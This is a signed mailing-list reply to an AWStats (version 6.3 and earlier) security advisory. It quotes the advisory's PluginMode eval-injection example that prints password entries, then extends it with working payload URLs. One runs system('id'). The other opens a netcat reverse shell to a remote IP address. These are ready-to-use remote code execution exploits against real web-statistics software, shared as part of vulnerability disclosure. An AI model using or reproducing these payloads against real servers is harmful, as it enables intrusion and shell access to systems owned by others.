-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
GHC@xxxxxxxxxxxxxxxxxxxxx wrote: | | /*==========================================*/ | // GHC -> AWStats <- ADVISORY | \\ PRODUCT: AWStats | // VERSION: <= 6.3 | \\ URL: http://awstats.sourceforge.net/ | // VULNERABILITY CLASS: Multiple vulnerabilities | \\ RISK: high | /*==========================================*/
[...]
| | PluginMode=:print+getpwent | | And the $function becomes 'BuildFullHTMLOutput_:print getpwent()'. | This will satisfy eval() requirements., and :print getpwent() is executed. | | http://www.lan.server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent | | Sanitazing limits user's input, but there is no filtration for call sympols '()'.
no, user is not limited, he can execute ANY command if he add ; at the end of the command, try this
awstats.pl?&PluginMode=:print+system('id')+;or even this
awstats.pl?&PluginMode=:print+system('nc+172.16.1.2+3000+-e+/bin/sh')+;
Ondra -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.0 (FreeBSD)
iD8DBQFCEhQ5fz/hUj18TqkRAm92AKCB8p7DEirtizNdeqIv1314VcclHgCaAoO8 t85gyPeNyeIKSl1NPDuBUaE= =CZ4M -----END PGP SIGNATURE-----
